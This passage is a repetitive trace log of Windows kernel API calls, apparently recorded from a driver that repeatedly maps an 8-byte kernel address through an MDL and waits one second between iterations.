| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029c18560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029c18560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029e13560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029e13560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a0f2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0f2560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a0fa560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0fa560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a101560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a101560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a10c560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a10c560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a113560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a113560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
| IoFreeMdl | Mdl_unk = 0xffffe00040932cf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a187560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a187560, MemoryDescriptorList_unk = 0xffffe0003bcb2440 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a4d5560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a4d5560, MemoryDescriptorList_unk = 0xffffe0003bcb2440 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c306640, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a4fc560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a4fc560, MemoryDescriptorList_unk = 0xffffe0003c306640 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c306640, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a65b560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a65b560, MemoryDescriptorList_unk = 0xffffe0003c306640 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1fc4c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, MemoryDescriptorList_unk_out = 0xffffe0003c1fc4c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a675560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a675560, MemoryDescriptorList_unk = 0xffffe0003c1fc4c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1fc4c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd56930 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd56930, MemoryDescriptorList_unk_out = 0xffffe0003bd56930 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd56930, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a697560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a697560, MemoryDescriptorList_unk = 0xffffe0003bd56930 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd56930 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a893560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a893560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a89a560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a89a560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a8b1560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a8b1560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a8ce560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a8ce560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a8d2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a8d2560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ab0f560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab0f560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ab12560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab12560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ab14560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab14560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ab4a560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab4a560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002adb4560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002adb4560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ae3b560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ae3b560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ae5c560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ae5c560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002af4d560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002af4d560, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002af52560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002af52560, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002af62560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002af62560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b0c6560 |
